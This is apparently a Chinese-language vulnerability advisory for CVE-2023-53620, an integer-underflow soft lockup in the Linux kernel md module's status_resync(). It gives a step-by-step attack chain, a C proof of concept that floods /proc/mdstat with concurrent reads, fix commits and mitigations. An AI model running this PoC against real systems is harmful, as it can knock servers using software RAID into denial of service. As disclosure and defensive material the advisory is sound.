CVE-2023-53620 Linux内核md模块软死锁漏洞

漏洞信息

漏洞编号

CVE-2023-53620

漏洞类型

整数溢出导致软死锁

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核 (md多重设备子系统)

漏洞概述

CVE-2023-53620是Linux内核中md（Multiple Devices，多重设备）子系统的一个软死锁（soft lockup）漏洞。该漏洞位于md模块的status_resync()函数中。在Linux内核的RAID管理中，md模块负责管理软件RAID阵列，而status_resync()函数用于向用户展示RAID阵列的同步进度信息。

该漏洞的根本原因在于status_resync()函数在计算'curr_resync - recovery_active'时存在整数溢出风险。由于curr_resync和recovery_active这两个变量在md_do_sync()函数中被并发更新，status_resync()函数在读取它们时存在竞态条件。当发生整数溢出时，计算结果可能变成一个巨大的数值，导致status_resync()函数陷入一个长时间运行的循环中，不断打印大量的'='字符来绘制进度条。这种长时间的循环会导致CPU占用过高，触发内核的软死锁检测机制，从而使系统响应变得极其缓慢甚至无响应。

该漏洞的CVSS评分为5.5，属于中等严重等级。其攻击向量为本地攻击（AV:L），需要低权限（PR:L），无需用户交互（UI:N），对机密性和完整性无影响，但会导致高可用性影响（A:H）。该漏洞主要影响运行Linux内核的服务器和工作站系统，尤其是使用软件RAID阵列的环境。

技术细节

从技术层面分析，该漏洞涉及Linux内核md子系统的并发同步问题。

漏洞原理：
1. 在md_do_sync()函数执行RAID同步操作时，会持续更新两个关键变量：curr_resync（当前已同步的扇区数）和recovery_active（恢复操作的偏移量）。
2. status_resync()函数负责生成类似'[============>........] resync = 61.4%'这样的进度条信息，它通过计算'curr_resync - recovery_active'来确定已完成的同步进度。
3. 由于status_resync()和md_do_sync()之间缺少适当的同步机制（如锁或内存屏障），status_resync()可能在curr_resync和recovery_active不一致的状态下读取这两个值。
4. 当recovery_active的值大于curr_resync时（例如在恢复操作刚刚启动或状态切换的瞬间），'curr_resync - recovery_active'会下溢为类型所能表示的最大正数（整数环绕）。
5. 这个巨大的数值被用作循环计数器，导致status_resync()进入一个几乎无限循环，持续打印'='字符，最终触发软死锁。

利用方式：
该漏洞的利用需要本地访问权限。攻击者需要：
1. 拥有系统的低权限账户访问权限；
2. 能够访问或触发md设备的同步状态查询，例如通过读取/proc/mdstat文件或使用mdadm工具查看RAID状态；
3. 在特定的时序条件下（recovery_active被更新但curr_resync尚未更新时）触发status_resync()的执行。

虽然该漏洞不直接提供权限提升或代码执行能力，但它可以导致系统拒绝服务（DoS），使受影响的系统陷入软死锁状态。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要获取目标系统的本地低权限账户访问权限，可以通过物理访问、SSH登录或其他方式获得。

STEP 2

步骤2：识别md设备状态

攻击者检查系统是否存在使用md（软件RAID）的设备，通过读取/proc/mdstat或使用mdadm工具查看当前是否有正在进行的同步或恢复操作。

STEP 3

步骤3：触发竞态条件

在md_do_sync()更新curr_resync和recovery_active的过程中，攻击者通过快速并发地调用status_resync()（例如反复读取/proc/mdstat），使得curr_resync - recovery_active发生整数下溢。

STEP 4

步骤4：触发软死锁

整数溢出导致status_resync()进入长时间运行的循环，持续打印进度条字符'='，触发内核软死锁检测机制，导致系统CPU占用率飙升，响应变得极其缓慢。

STEP 5

步骤5：拒绝服务

系统陷入软死锁状态后，正常的管理操作和其他进程的执行受到严重影响，导致拒绝服务（DoS）状态。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/* CVE-2023-53620 PoC - Trigger soft lockup in md status_resync()
 * 
 * This PoC demonstrates how to trigger the soft lockup vulnerability
 * in the Linux kernel's md subsystem by rapidly querying RAID sync status
 * while a resync operation is in progress.
 * 
 * Requirements: Linux kernel with md module, root or sudo access to setup RAID
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sys/stat.h>
#include <signal.h>
#include <sys/wait.h>

#define LOOPS 1000000

int main(int argc, char *argv[])
{
    int fd;
    char buf[4096];
    int i;
    pid_t pid;
    
    /* Step 1: Ensure md device exists and resync is active.
     * This typically requires root privileges to setup:
     *   mdadm --create /dev/md0 --level=1 --raid-devices=2 /dev/loop0 /dev/loop1
     *   mdadm --grow /dev/md0 --level=5 --raid-devices=3 --add /dev/loop2
     */
    
    /* Step 2: Fork multiple processes to repeatedly read /proc/mdstat
     * This will trigger status_resync() concurrently with md_do_sync()
     */
    for (i = 0; i < 4; i++) {
        pid = fork();
        if (pid == 0) {
            /* Child process: rapidly query md status */
            while (1) {
                fd = open("/proc/mdstat", O_RDONLY);
                if (fd >= 0) {
                    while (read(fd, buf, sizeof(buf)) > 0)
                        ;
                    close(fd);
                }
            }
            exit(0);
        }
    }
    
    /* Parent process: wait for soft lockup to trigger */
    printf("Triggering CVE-2023-53620 soft lockup...\n");
    printf("Monitor system with: watch cat /proc/mdstat\n");
    sleep(60);
    
    /* Cleanup */
    kill(0, SIGTERM);
    return 0;
}

影响范围

Linux kernel < 6.6 (修复提交: 23309704e90859af2662bedc44101e6d1d2ece7e)

Linux kernel stable 分支 (修复提交: 6efddf1e32e2a264694766ca485a4f5e04ee82a7)

Linux kernel stable 分支 (修复提交: b4acb6c3ede88d6b7d33742a09e63cfce5e7fb69)

防御指南

临时缓解措施

在无法立即升级内核的情况下，可以采取以下临时缓解措施：1) 监控/proc/mdstat的访问，发现异常频繁读取时进行告警；2) 限制非特权用户访问md相关设备文件和/proc/mdstat；3) 在系统层面配置适当的CPU看门狗和软死锁检测阈值；4) 避免在关键生产环境中使用软件RAID或考虑使用硬件RAID替代；5) 在执行RAID同步操作期间减少并发查询，避免触发竞态条件。